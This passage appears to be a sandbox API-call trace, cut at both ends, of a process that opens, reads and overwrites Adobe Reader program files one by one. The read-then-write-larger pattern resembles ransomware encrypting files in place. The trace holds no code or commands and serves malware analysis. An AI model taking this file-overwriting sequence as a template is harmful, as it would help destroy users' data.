lpOverlapped=0x0) returned 1 [0081.694] CloseHandle (hObject=0x1d8) returned 1 [0081.694] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HRV\\Flash.HRV" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_hrv\\flash.hrv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0081.695] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0081.695] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xa00 [0081.696] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0081.696] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.696] ReleaseMutex (hMutex=0x168) returned 1 [0081.696] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Flash.HRV", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0081.696] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Flash.HRV", cchWideChar=9, lpMultiByteStr=0x1f7342c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Flash.HRV", lpUsedDefaultChar=0x0) returned 9 [0081.696] ReadFile (in: hFile=0x1d8, lpBuffer=0x1eac3d8, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesRead=0x345f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0081.708] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0081.708] WriteFile (in: hFile=0x1d8, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x345f2d0*=0xf88, lpOverlapped=0x0) returned 1 [0081.708] CloseHandle (hObject=0x1d8) returned 1 [0081.708] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_POL\\Flash.POL" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_pol\\flash.pol"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0081.715] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0081.715] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xa00 [0081.715] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0081.715] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.715] ReleaseMutex (hMutex=0x168) returned 1 [0081.715] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Flash.POL", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0081.715] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Flash.POL", cchWideChar=9, lpMultiByteStr=0x1f7356c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Flash.POL", lpUsedDefaultChar=0x0) returned 9 [0081.715] ReadFile (in: hFile=0x1d8, lpBuffer=0x1eac3d8, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesRead=0x345f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0082.003] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0082.003] WriteFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x345f2d0*=0xf88, lpOverlapped=0x0) returned 1 [0082.003] CloseHandle (hObject=0x1d8) returned 1 [0082.004] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUS\\Flash.RUS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_rus\\flash.rus"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0082.005] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0082.005] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xa00 [0082.005] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0082.005] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0082.005] ReleaseMutex (hMutex=0x168) returned 1 [0082.005] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Flash.RUS", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0082.005] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Flash.RUS", cchWideChar=9, lpMultiByteStr=0x1f735ac, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Flash.RUS", lpUsedDefaultChar=0x0) returned 9 [0082.005] ReadFile (in: hFile=0x1d8, lpBuffer=0x1eac3d8, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesRead=0x345f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0082.007] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0082.007] WriteFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x345f2d0*=0xf88, lpOverlapped=0x0) returned 1 [0082.007] CloseHandle (hObject=0x1d8) returned 1 [0082.008] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SLV\\Flash.SLV" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_slv\\flash.slv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0082.009] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0082.009] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xa00 [0082.009] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0082.010] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0082.010] ReleaseMutex (hMutex=0x168) returned 1 [0082.010] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Flash.SLV", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0082.010] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Flash.SLV", cchWideChar=9, lpMultiByteStr=0x1f7356c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Flash.SLV", lpUsedDefaultChar=0x0) returned 9 [0082.010] ReadFile (in: hFile=0x1d8, lpBuffer=0x1eac3d8, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesRead=0x345f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0082.042] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0082.043] WriteFile (in: hFile=0x1d8, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x345f2d0*=0xf88, lpOverlapped=0x0) returned 1 [0082.043] CloseHandle (hObject=0x1d8) returned 1 [0082.043] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_UKR\\Flash.UKR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_ukr\\flash.ukr"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0082.045] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0082.045] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xa00 [0082.045] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0082.045] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0082.045] ReleaseMutex (hMutex=0x168) returned 1 [0082.045] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Flash.UKR", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0082.045] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Flash.UKR", cchWideChar=9, lpMultiByteStr=0x1f7342c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Flash.UKR", lpUsedDefaultChar=0x0) returned 9 [0082.045] ReadFile (in: hFile=0x1d8, lpBuffer=0x1eac3d8, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesRead=0x345f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0082.068] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0082.068] WriteFile (in: hFile=0x1d8, lpBuffer=0x2665868*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesWritten=0x345f2d0*=0xf88, lpOverlapped=0x0) returned 1 [0082.068] CloseHandle (hObject=0x1d8) returned 1 [0082.068] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\reflow.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\reflow.api"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0082.069] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0082.070] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x54e63 [0082.070] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0082.070] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0082.070] ReleaseMutex (hMutex=0x168) returned 1 [0082.070] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="reflow.api", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0082.070] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="reflow.api", cchWideChar=10, lpMultiByteStr=0x1f7366c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="reflow.api", lpUsedDefaultChar=0x0) returned 10 [0082.070] ReadFile (in: hFile=0x1d8, lpBuffer=0x2882db8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x345f278*=0x8000, lpOverlapped=0x0) returned 1 [0082.107] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x53e63 [0082.107] ReadFile (in: hFile=0x1d8, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0082.118] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x53e63 [0082.118] WriteFile (in: hFile=0x1d8, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0082.119] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0082.119] WriteFile (in: hFile=0x1d8, lpBuffer=0x286cf58*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesWritten=0x345f28c*=0x8000, lpOverlapped=0x0) returned 1 [0082.119] CloseHandle (hObject=0x1d8) returned 1 [0082.119] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\3difr.x3d" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins3d\\3difr.x3d"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0082.128] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0082.128] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x41b90 [0082.128] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0082.128] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0082.128] ReleaseMutex (hMutex=0x168) returned 1 [0082.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="3difr.x3d", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0082.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="3difr.x3d", cchWideChar=9, lpMultiByteStr=0x1f735ac, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3difr.x3d", lpUsedDefaultChar=0x0) returned 9 [0082.129] ReadFile (in: hFile=0x1e4, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x345f278*=0x8000, lpOverlapped=0x0) returned 1 [0082.136] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x40b90 [0082.136] ReadFile (in: hFile=0x1e4, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0082.142] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x40b90 [0082.142] WriteFile (in: hFile=0x1e4, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0082.143] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0082.143] WriteFile (in: hFile=0x1e4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x345f28c*=0x8000, lpOverlapped=0x0) returned 1 [0082.143] CloseHandle (hObject=0x1e4) returned 1 [0082.144] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\reader_sl.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\reader_sl.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0082.144] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0082.145] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x8b98 [0082.145] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0082.145] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0082.145] ReleaseMutex (hMutex=0x168) returned 1 [0082.145] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="reader_sl.exe", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0082.145] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="reader_sl.exe", cchWideChar=13, lpMultiByteStr=0x1f7352c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="reader_sl.exe", lpUsedDefaultChar=0x0) returned 13 [0082.145] ReadFile (in: hFile=0x1e4, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x345f278*=0x4000, lpOverlapped=0x0) returned 1 [0082.160] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x7b98 [0082.160] ReadFile (in: hFile=0x1e4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0082.168] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x7b98 [0082.168] WriteFile (in: hFile=0x1e4, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0082.169] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0082.169] WriteFile (in: hFile=0x1e4, lpBuffer=0x2692de8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2692de8*, lpNumberOfBytesWritten=0x345f28c*=0x4000, lpOverlapped=0x0) returned 1 [0082.169] CloseHandle (hObject=0x1e4) returned 1 [0082.170] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\create_form.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\create_form.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0082.183] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0082.183] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x4aa [0082.184] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0082.184] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0082.184] ReleaseMutex (hMutex=0x168) returned 1 [0082.184] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="create_form.gif", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0082.184] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="create_form.gif", cchWideChar=15, lpMultiByteStr=0x1f7328c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="create_form.gif", lpUsedDefaultChar=0x0) returned 15 [0082.184] ReadFile (in: hFile=0x1e4, lpBuffer=0x286cf78, nNumberOfBytesToRead=0x4aa, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesRead=0x345f2bc*=0x4aa, lpOverlapped=0x0) returned 1 [0082.198] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0082.198] WriteFile (in: hFile=0x1e4, lpBuffer=0x1ea9eb8*, nNumberOfBytesToWrite=0xa32, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea9eb8*, lpNumberOfBytesWritten=0x345f2d0*=0xa32, lpOverlapped=0x0) returned 1 [0082.199] CloseHandle (hObject=0x1e4) returned 1 [0082.199] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\forms_super.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\forms_super.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0082.205] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0082.205] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x228 [0082.205] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0082.205] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0082.205] ReleaseMutex (hMutex=0x168) returned 1 [0082.205] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="forms_super.gif", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 